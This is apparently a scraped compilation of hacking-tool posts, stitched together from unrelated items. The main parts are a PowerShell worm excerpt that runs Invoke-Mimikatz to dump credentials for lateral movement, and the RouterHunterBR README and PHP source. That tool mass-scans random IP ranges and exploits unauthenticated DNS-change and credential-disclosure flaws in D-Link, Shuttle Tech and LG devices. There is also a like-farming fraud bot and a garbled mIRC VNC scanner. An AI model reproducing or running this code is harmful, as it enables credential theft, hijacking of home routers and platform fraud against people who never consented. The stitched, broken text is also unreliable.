$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition
$scriptPath = $scriptPath + "\Invoke-Mimikatz.ps1 -dumpcreds"
$creds = "powershell.exe -exec Bypass " + $scriptPath
$creds_str = runCMD $creds

Followed by some nifty regex to extract just username and password from output:

$creds_regex= @"
.*\*\sUsername.*
.*\*\sDomain.*
.*\*\sPassword.*
"@
$creds_str = $creds -replace " ", "`r`n"
$cred_store = @{}
$found = new-object System.Text.RegularExpressions.Regex($creds_regex, [System.Text.RegularExpressions.Regexoptions]::Multiline)
$m=$found.Matches($creds_str)

And finally, some last minute parsing which trims the strings to exactly what is needed:

function parsed() {
    Param([string]$str1)
    $p1 = $str1 -split '[\r\n]'
    $parse=@()
    for ($j=0; $j -lt 3; $j++) {
        $num = $j*2
        $p2 = $p1[$num].split(":")
        #Write-Host $j "," $num "," $p2
        $p3 = $p2[1]
        $parse+= , $p3
    }
    return $parse
}

Additional thoughts

At the top of the post, as well as here, is a link for the complete PoC PowerWorm.ps1. It works well on Vista/7, but there seem to be a few bugs trying to run this against XP/8 (due to an error with Invoke-Mimikatz). I used something very similar after gaining domain admin credentials, then began laterally moving in an environment where psexec/winrm/pass-the-hash tricks did not seem to work. I did have some issues (duh) with this worm hammering the DC because there is no check in place to see if the worm had already run on a host, and the DC is the first host in the domain hosts array! The fix for this issue is left as an exercise for the reader. Also, this script could be easily modified to roll out other files/scripts/binaries across a domain automatically, which I also did trying to push traffic generation scripts for testing at a later date, but that story is for another post.
Source: https://khr0x40sh.wordpress.com/2014/11/13/powershell-worm/
17. The security audit of the TrueCrypt disk-encryption software has been completed, with no evidence of any critical design vulnerabilities or deliberate backdoors in its code.

TrueCrypt -- one of the world's most-used open source file encryption programs, used by millions of privacy and security enthusiasts -- has been audited for the past two years by a team of security researchers to assess whether it could be easily exploited and cracked. Hopefully, it has cleared the second phase of the audit.

TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OS X and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions, including the system partition.

NO NSA BACKDOORS

Security auditors and cryptography experts at NCC took the initiative to perform a public information security audit of TrueCrypt in response to concerns that the National Security Agency (NSA) may have tampered with it, according to a classified document leaked by Edward Snowden.

TrueCrypt cleared the first phase of the audit, which reviewed the blueprints of the software, and was given a relatively clean bill of health almost a year ago. In the first phase, auditors discovered 11 issues of medium and low severity in the software.

Now, the auditors from NCC Group's Cryptography and Security Audit Services have finalized and published the 21-page Open Cryptographic report on the second phase of the audit, which examined TrueCrypt's implementation of random number generators and critical key algorithms, and various encryption cipher suites.

FOUR VULNERABILITIES DISCOVERED

The report uncovered four vulnerabilities in the latest original version of the software, but none of them could lead to a bypass of confidentiality or let hackers use deformed inputs to subvert TrueCrypt.
The vulnerabilities are given below:

- Keyfile mixing is not cryptographically sound -- Low severity
- Unauthenticated ciphertext in volume headers -- Undetermined
- CryptAcquireContext may silently fail in unusual scenarios -- High severity
- AES implementation susceptible to cache timing attacks -- High severity

The most critical of the four vulnerabilities involved the use of the Windows API to generate random numbers used by the master cryptographic key. A separate vulnerability of undetermined severity: the checks for volume header decryption were susceptible to tampering. Also, a low severity flaw: the method used to mix the entropy of keyfiles was not cryptographically sound. Another high severity flaw identified refers to "several included AES implementations that may be vulnerable to cache-timing attacks."

Source: thehackernews.com
18. AddMeFast-Bot

Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service

Update: not working anymore, 01-10-2015

import mechanize
import re
from time import sleep
import threading

#cut something in many parts
def chunkIt(seq, num):
    avg = len(seq) / float(num)
    out = []
    last = 0.0
    while last < len(seq):
        out.append(seq[int(last):int(last + avg)])
        last += avg
    return out

#generates a browser
def genbrowser():
    br = mechanize.Browser()
    br.set_handle_robots(False)
    br.set_handle_redirect(True)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')]
    return br

class AMB(threading.Thread):
    # define environment variable
    def __init__(self, rangex, user, passw):
        self.br1 = genbrowser()
        self.alogin(self.br1, user, passw)
        self.range = rangex
        threading.Thread.__init__(self)
        self.timeout_value = 30

    # log the user in
    def alogin(self, br, user, passw):
        br.open('http://addmefast.com', \
                'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw))
        if 'Welcome' in br.response().read():
            print "Login successful on add me fast"

    #main function
    def run(self):
        sleep(1)
        for i in self.range:
            try:
                #goes to a page with many links to like
                #act=getLinksList&params={"network":"1", "page":"1", "isFBpage":"1"}
                self.br1.open('http://addmefast.com/includes/ajax.php',
                              'act=getLinksList&params={"network":"1", "page":"%s", "isFBpage":"1"}' % (i),
                              timeout=self.timeout_value)
                # read the page once and run both regexes over the same text
                html = self.br1.response().read()
                #gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365
                page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', html)
                #confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212");
                number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", html)
                # walk the matched rows pairwise (the original always used row 0, so only one
                # link per page was ever processed; also don't reuse the page counter i)
                for k in range(min(len(page_and_Lid), len(number_and_token))):
                    page, Lid = page_and_Lid[k]
                    number, token = number_and_token[k]
                    #http://addmefast.com/includes/ajax.php, act=checkFollowed&params={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"}
                    self.br1.open('http://addmefast.com/includes/ajax.php',
                                  'act=checkFollowed&params={"id":"%s", "url":"%s", "network":"1"}' % (number, page),
                                  timeout=self.timeout_value)
                    #http://addmefast.com/includes/ajax.php, act=updateAction&params={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"}
                    self.br1.open('http://addmefast.com/includes/ajax.php',
                                  'act=updateAction&params={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token),
                                  timeout=self.timeout_value)
                    print "New shit made"
            except Exception, e:
                print e

if __name__=='__main__':
    nbthreads = input('Number of threads: ')
    z = chunkIt(range(1,int(open("number.txt").read())+1), nbthreads)
    user, passw = open('account.txt').read().split(':', 1)
    while 1:
        for i in z:
            try:
                AMB(i, user, passw).start()
            except:
                pass
        while threading.activeCount() > 1:
            sleep(1)

Source
19. GrabME

Sensitive information extraction tool.

Report a bug: https://github.com/GuerrillaWarfare/GrabME/issues
Up-to-date usage examples: https://github.com/GuerrillaWarfare/GrabME/wiki/GrabME-Usage-Examples

GrabME - Extract sensitive information from a file.

Usage: ./grabme.py [FILE]

What can it extract?:
- Links
- hash values
- email addresses
- ipv4, ipv6 addresses
- bitcoin wallet addresses
- MAC addresses with : or - (delimiters)
- USA-based telephone, Social Security and major credit card numbers.

Guerrilla Warfare Free License ("GWFL") v1.0

You're free to modify this software to YOUR liking or leave it as is. This software comes as is, and may or may not receive any additional updates. Contact the developer for more help. The initial download and use of this software constitutes that you adhere and comply to the writing of this end user license agreement (EULA). The Developer is NOT at ALL under any circumstances responsible for YOUR actions or the actions of any other third party instances that may use this software for any illegal or nefarious activities.

Download Source
20. ;Copy code into your mIRC remote scripts
;Syntax is /rvnc <ip.ip.ip.ip> <port>
;ex: /rvnc 192.168.0.0 5900
;above command will scan from 192.168.0.0 to 192.255.255.255 then halt.
;Illegal if you decide to scan IP addresses not in your network
;Education purposes only. Please keep undetected from antiviruses as this code is CLEAN!!!

on *:sockopen:vncscan*:{
  if ($sockerr) { return }
}
on *:sockread:vncscan*:{
  :nextread
  sockread &vnc
  if ($sockbr == 0) return
  echo @vnc VNC Scan halted. | .timerRANGE off | halt
  }
}

press Alt + R and paste

source: secret-zone.net
21. EvilAP_Defender is an application that helps wireless network administrators discover and prevent Evil Access Points (APs) from attacking wireless users. The application can be run at regular intervals to protect your wireless network from Evil Twin-like attacks. By configuring the tool you can get notifications sent to your email whenever an evil access point is discovered. Additionally you can configure the tool to perform a DoS on the discovered evil AP in order to give the administrator more time to react. However, notice that the DoS will only be performed against evil APs which have the same SSID but a different BSSID (AP's MAC address) or run on a different channel. This avoids DoSing your legitimate network.

The tool is able to discover evil APs using one of the following characteristics:

* Evil AP with a different BSSID address
* Evil AP with the same BSSID as the legitimate AP but a different attribute (including: channel, cipher, privacy protocol, and authentication)
* Evil AP with the same BSSID and attributes as the legitimate AP but different tagged parameters - mainly a different OUI (tagged parameters are additional values sent along with the beacon frame. Currently no software-based AP gives the ability to change these values; generally software-based APs are very poor in this area).

Whenever an Evil AP is discovered the tool will alert the admin through email (SMS will be supported soon). Additionally the tool will enter a preventive mode in which it will DoS the discovered Evil AP.

The tool can be configured easily by starting in what we call "Learning Mode". In this mode you can whitelist your legitimate network. This can be done by following the wizards during the Learning Mode. You can also configure the preventive mode and admin notification from there as well. Finally, you need to change into Normal Mode or re-run the tool in this mode in order to start discovering Evil APs.
Requirements: - Aircrack-ng suite - Your wireless card must be supported by Aircrack-ng. Check the following URL: compatibility_drivers [Aircrack-ng] - MySQL - Python Learning Mode: This Mode can be invoked with the “-L” switch. When running the tool in this mode the tool will start by scanning for the available wireless networks. Then it lists all the found wireless networks with whitelisted APs colored with green. It also lists the whitelist APs and OUIs (tagged parameters). The tool also provides several options which allow you to add/remove SSIDs into/from whitelist. You need to whitelist your SSID first before running the tool in the Normal Mode. Moreover, you can configure Preventive Mode from “Update options -> Configure Preventive Mode”. First you need to set the Deauthentication time (in seconds) into a number bigger than 0 (setting the value to 0 will disable this mode). Then you need to set the number of time to repeat the attack. This is so important for attacking more than Evil AP because the tool cannot attack all of them in the same time (how can you attack several APs on different channels? Later on we will improve the tool and allow it to attack (in the same time) several APs in the same channel). The tool will attack the first Evil AP for specified deauthentication time then it will stop and attack the second one and so on. Be careful from increasing the Deatuth time so much because this may attack only one AP and leaving the others running. My recommendation is to set the Deauth time to something suitable such as 10 seconds and increasing the repeat time. Finally, you can configure admin notification by setting admin email, SMPT server address, SMTP username (complete email address) for authentication purpose, and SMTP password. You can use any account on Gmail or your internal SMTP server account. Normal Mode: This is the mode in which the tool starts to discover Evil APs and notify the administrator whenever one is discovered. 
This mode can be invoked by “-N” switch. Feedback: Feedback is always welcomed on the tool git or through my email: moha99sa at yahoo dot com. Download Source
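The three detection characteristics and the "same SSID, different BSSID or channel" rule for preventive mode, as an added example that is not part of EvilAP_Defender: it classifies observed beacons against a whitelisted AP and marks which findings preventive mode would be allowed to act on. The AP field names and the sample scan data are constructed for the example.

```python
"""Added example (not EvilAP_Defender code): apply the README's three
evil-AP rules to a scan and mark what preventive mode may deauth."""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class AP:
    """One beacon as a scanner would record it (field names are assumed)."""
    ssid: str
    bssid: str
    channel: int
    privacy: str   # e.g. "WPA2" or "OPN"
    cipher: str    # e.g. "CCMP"
    auth: str      # e.g. "PSK"
    oui: str       # vendor OUI carried in the beacon's tagged parameters


# The README's "attributes": channel, cipher, privacy protocol, authentication.
ATTRIBUTES = ("channel", "privacy", "cipher", "auth")


@dataclass(frozen=True)
class Finding:
    ap: AP
    reason: str
    dos_eligible: bool


def dos_eligible(evil: AP, legit: AP) -> bool:
    """README rule: DoS only an evil AP with the same SSID but a different
    BSSID, or one on a different channel, so the legitimate AP (same BSSID,
    same channel) is never deauthed by mistake."""
    return evil.bssid != legit.bssid or evil.channel != legit.channel


def classify(whitelist: List[AP], observed: List[AP]) -> List[Finding]:
    """One Finding per observed beacon that uses a whitelisted SSID but is
    not exactly one of our own APs; foreign SSIDs are ignored."""
    by_ssid: Dict[str, Dict[str, AP]] = {}
    for ap in whitelist:
        by_ssid.setdefault(ap.ssid, {})[ap.bssid] = ap
    findings: List[Finding] = []
    for ap in observed:
        ours = by_ssid.get(ap.ssid)
        if not ours:
            continue  # not an evil twin of a whitelisted network
        legit = ours.get(ap.bssid)
        if legit is None:
            # Rule 1: our SSID advertised from a BSSID we never whitelisted
            findings.append(Finding(ap, "different BSSID", True))
            continue
        diffs = [a for a in ATTRIBUTES if getattr(ap, a) != getattr(legit, a)]
        if diffs:
            # Rule 2: BSSID spoofed, but an attribute gives it away
            reason = "same BSSID, different " + ",".join(diffs)
            findings.append(Finding(ap, reason, dos_eligible(ap, legit)))
        elif ap.oui != legit.oui:
            # Rule 3: only the tagged-parameter OUI differs; same BSSID and
            # channel, so dos_eligible() is False and it is alert-only
            reason = "same BSSID and attributes, different OUI"
            findings.append(Finding(ap, reason, dos_eligible(ap, legit)))
    return findings


# Constructed sample data: one whitelisted AP, then a scan containing it,
# one impostor per rule (rule 2 twice) and one unrelated network.
LEGIT = AP("CorpNet", "00:11:22:33:44:55", 6, "WPA2", "CCMP", "PSK", "00:11:22")
SCAN = [
    LEGIT,
    AP("CorpNet", "66:77:88:99:aa:bb", 6, "WPA2", "CCMP", "PSK", "66:77:88"),
    AP("CorpNet", "00:11:22:33:44:55", 11, "WPA2", "CCMP", "PSK", "00:11:22"),
    AP("CorpNet", "00:11:22:33:44:55", 6, "OPN", "", "", "00:11:22"),
    AP("CorpNet", "00:11:22:33:44:55", 6, "WPA2", "CCMP", "PSK", "de:ad:be"),
    AP("CoffeeShop", "cc:dd:ee:ff:00:11", 1, "OPN", "", "", "cc:dd:ee"),
]


def sample_run() -> List[Finding]:
    return classify([LEGIT], SCAN)


if __name__ == "__main__":
    for f in sample_run():
        action = "DoS in preventive mode" if f.dos_eligible else "alert only"
        print(f"{f.ap.bssid} ch{f.ap.channel}: {f.reason} -> {action}")
```

Note that the open-network impostor on channel 6 is reported but not DoS-eligible: it shares BSSID and channel with the real AP, which is exactly the case the README excludes so the legitimate network is not attacked.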
  22. https://anubis.iseclab.org/?action=result&task_id=19f2b5500d3d041548df1854e4d282270&format=html
  23. As the past has shown us, cybercriminals are not the most trustworthy people when it comes to holding valuable sources, and it looks like we're about to get another reminder of that, this time with an exploit pack leak.

RIG is a popular exploit kit which has been around for about a year and sold on various "underground" forums. On February 3rd 2015 a user claiming to be the "Official HF Sales Rep" posted a sales thread on hackforums (HF), which is unusual as most serious sellers avoid this forum completely. It's likely the decision to allow resellers on this specific board was due to a large amount of users trying to rent out access to their RIG accounts, resulting in lost income for the seller.

Hackforums RIG sales thread

Although the HF reseller first claimed to be a verified seller, the claims soon escalated into being "more than just a seller", and before long he was registering on private forums claiming to be one of the developers.

Sellers with benefits

Private forum introduction

His introduction into the private forum didn't go too well: First, members pointed out that his RIG prices were nearly 40% higher than the official sellers' (typical of a reseller, not a developer), then they made fun of him when someone posted screenshots of his website, which was requesting a $3000 payment to gain access to his never-heard-of private forum. Eventually the entire thread turned into people making fun of him, before the administrator banned his account.

It seems like the RIG owner was less than pleased with the reseller's antics because the next day, in a conversation with another member, the owner declared that he had suspended the reseller for attempting to scam customers, which isn't surprising given he was requesting that people pay him $3000 for access to an imaginary private forum.

Conversation between a HF member and RIG owner

Shortly after, the reseller does what any cybercriminal does when his enterprise begins crumbling around him: He signs up for twitter and becomes a security researcher??? I don't even....

The twitter account, which is a pun on MalwareMustDie, claims to be in possession of the RIG source code as well as a recent database dump, and is currently tweeting a download link at various security researchers (not me though, apparently I'm not good enough). The file, which is password protected, was deleted from the filehost after less than 24 downloads, so I am not able to confirm if this is legit or just another scriptkiddie tantrum.

A screenshot allegedly showing panel files and sql database dump

RIG owner confirms he may have database and older version of exploit kit.

I'll post updates when I have more info.

Updated 02/12/2015 09:00 (UTC)
I've confirmed with 3 people that the leak is in fact legitimate, and a fairly recent version of the pack, though it is possible some parts may be missing. @kafeine has mentioned that he thinks someone with access to the RIG panel may be stealing traffic. He reports that occasionally the exploit payload appears to be replaced with another (usually cryptowall), which coincides with a lot of claims made by customers who bought RIG through the reseller.

a RIG thread pushing 2 different payloads

Due to the way in which the RIG exploit pack works (the exploiting is done by a back-end server, so no exploits are contained within the leak), I have decided to upload it here (thanks to @kafeine for files and information).

Via RIG Exploit Kit - Source Code Leak | MalwareTech
  24. Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices.

Readme:

# RouterHunterBR TOOL - Unauthenticated Remote DNS , Scanner ranger IP.
* Script exploit developed by INURL - BRAZIL
* Script Name: SCANNER RouterHunterBR 1.0
* TIPE: TOOL - Unauthenticated Remote DNS
* AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
* AUTOR: Jhonathan davi / NICK: Jhoon
* EMAIL*: inurllbr@gmail.com
* Blog*: http://blog.inurl.com.br
* Twitter*: https://twitter.com/googleinurl
* Fanpage*: https://fb.com/InurlBrasil
* GIT*: https://github.com/googleinurl
* PASTEBIN*: http://pastebin.com/u/googleinurl
* YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
* PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/

- Description:
------
The script explores three vulnerabilities in routers
* 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/
* 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/
* 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/

- Execute:
------
```
Simple search:
php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
Set IPS random:
php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
Set source file:
php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt
Set proxy:
php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118'
Proxy format:
--proxy 'localhost:8118'
--proxy 'socks5://googleinurl@localhost:9050'
--proxy 'http://admin:12334@172.16.0.90:8080'
```

- Dependencies:
------
```
sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033
```

- EDITING TO ADD NEW EXPLOITS GETS:
------
```
TO DEFINE MORE EXPLOITS GET: EX:
$params['exploit_model']['model_name'] = 'file_exploit.php';
$params['exploit_model']['model_001'] = '/file001CGI.cgi';
$params['exploit_model']['model_002'] = '/file001php.php';
$params['exploit_model']['model_003'] = '/file001.html';

#DEFINITION OF EXPLOITS
line 92: $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1";
line 93: $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}";
line 94: $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi";
```

Download:
<?php/* * Script exploit developed by INURL - BRAZIL * Script Name: SCANNER RouterHunterBR 1.0 * TIPE: TOOL - Unauthenticated Remote DNS change/ users & passwords * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL * AUTOR: Jhonathan davi / NICK: Jhoon * EMAIL*: inurllbr@gmail.com * Blog*: http://blog.inurl.com.br * Twitter*: https://twitter.com/googleinurl * Fanpage*: https://fb.com/InurlBrasil * GIT*: https://github.com/googleinurl * PASTEBIN*: http://pastebin.com/u/googleinurl * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/'>http://packetstormsecurity.com/user/googleinurl/ ---------------------------------------------------------- * Description:* The script explores two vulnerabilities in routers 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35995/ 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit reference: http://www.exploit-db.com/exploits/35917/ 03 - LG DVR LE6016D / 
Unauthenticated users/passwords disclosure exploitit reference: http://www.exploit-db.com/exploits/36014/ ---------------------------------------------------------- * Execute* Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 'http://admin:12334@172.16.0.90:8080' ---------------------------------------------------------- * Dependencies* sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033 ---------------------------------------------------------- *Update* https://github.com/googleinurl/RouterHunterBR ---------------------------------------------------------- */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); (!isset($_SESSION) ? session_start() : NULL); $_SESSION["cont_ip"] = 0; //SETANDO CORES TERMINAL $_SESSION["c00"] = "\033[0m"; // COLOR END $_SESSION["c01"] = "\033[1;37m"; // WHITE $_SESSION["c02"] = "\033[1;33m"; // YELLOW $_SESSION["c13"] = "\033[02;31m"; // DARK RED $_SESSION["c05"] = "\033[1;32m"; // GREEN LIGHT $_SESSION["c07"] = "\033[1;30m"; // DARK GREY $command = getopt('h::', array('dns1:', 'dns2:', 'file:', 'proxy:', 'output:', 'limit-ip:', 'range:', 'rand::', 'help::', 'ajuda::')); //VERIFYING LIB php5-curl IS INSTALLED. (!function_exists('curl_exec') ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c00"]}\n")) : NULL ); (!defined('STDIN') ? 
(__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}Please run it through command-line!{$_SESSION["c00"]}\n")) : NULL); empty($command) ? (__banner("{$_SESSION["c01"]}0x__[{$_SESSION["c00"]}{$_SESSION["c02"]}DEFINE THE USE OF ARGUMENTS{$_SESSION["c00"]}\n")) : NULL; (isset($opcoes['h']) || isset($command['help']) || isset($command['ajuda']) ? __banner(NULL) : NULL); #=============================================================================== ########################## CONFIGURATION SCRITPT ############################### #=============================================================================== $params['dns1'] = not_isnull_empty($command['dns1']) ? $command['dns1'] : NULL; $params['dns2'] = not_isnull_empty($command['dns2']) ? $command['dns2'] : NULL; /* TO DEFINE MORE EXPLOITS GET: EX: $params['exploit_model']['model_name'] = 'file_exploit.php'; $params['exploit_model']['model_001'] = '/file001CGI.cgi'; $params['exploit_model']['model_002'] = '/file001php.php'; $params['exploit_model']['model_003'] = '/file001.html'; */ #DEFINITION OF EXPLOITS $params['exploit_model']['Shuttle_Tech_ADSL_Modem_Router_915_WM'] = "/dnscfg.cgi?dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}&dnsDynamic=0&dnsRefresh=1"; $params['exploit_model']['D_Link_DSL_2740R'] = "/dns_1?Enable_DNSFollowing=1&dnsPrimary={$params['dns1']}&dnsSecondary={$params['dns2']}"; $params['exploit_model']['LG_DVR_LE6016D'] = "/dvr/wwwroot/user.cgi"; !not_isnull_empty($params['dns2']) && !not_isnull_empty($params['dns2']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE DNS1 and DNS2 ex: --dns1 '0.0.0.0.0' --dns2 '0.0.0.0.0'{$_SESSION["c00"]}\n") : NULL; $params['file_output'] = not_isnull_empty($command['output']) ? $command['output'] : __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}DEFINE FILE SAVE OUTPUT ex: --output saves.txt{$_SESSION["c00"]}\n"); $params['file'] = not_isnull_empty($command['file']) ? 
__getIPFile($command['file']) : NULL; $params['rand'] = isset($command['rand']) ? TRUE : NULL; $params['limit-ip'] = not_isnull_empty($command['limit-ip']) ? $command['limit-ip'] : NULL; $params['proxy'] = not_isnull_empty($command['proxy']) ? $command['proxy'] : NULL; $params['range'] = not_isnull_empty($command['range']) ? __getRange($command['range']) : NULL; $params['op'] = NULL; $params['op'] = not_isnull_empty($params['range']) && !($params['rand']) && !not_isnull_empty($params['file']) ? 0 : $params['op']; $params['op'] = ($params['rand']) && !not_isnull_empty($params['range']) && !not_isnull_empty($params['file']) ? 1 : $params['op']; $params['op'] = not_isnull_empty($params['file']) && !($params['rand']) && !not_isnull_empty($params['range']) ? 2 : $params['op']; $params['line'] = "-------------------------------------------------------------\n"; #=============================================================================== function __plus() { ob_flush(); flush(); } //FILTRE USER PASS LG_DVR_LE6016D function __getUserPass($html) { $set = array(); $set['reg1'] = '/<name>(.*?)<\/name>/i'; $set['reg2'] = '/<pw>(.*?)<\/pw>/i'; if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { preg_match_all($set['reg1'], $html, $set['user']); preg_match_all($set['reg2'], $html, $set['pass']); for ($i = 0; $i <= count($set['user']); $i++) { $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; } return $set['out']; } return FALSE; } //INFORMATION IP function __infoIP($ip) { __plus(); $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; } //VALIDATION VARIABLE function not_isnull_empty($value = NULL) { RETURN !is_null($value) && !empty($value) ? 
TRUE : FALSE; } //MENU BANNER function __banner($msg, $op = NULL) { system("command clear"); print_r(" \n{$_SESSION["c01"]} _____ {$_SESSION["c01"]} (_____) {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) {$_SESSION["c01"]} \ / {$_SESSION["c01"]} \ / {$_SESSION["c01"]} /=\ {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: --proxy 'localhost:8118' --proxy 'socks5://googleinurl@localhost:9050' --proxy 
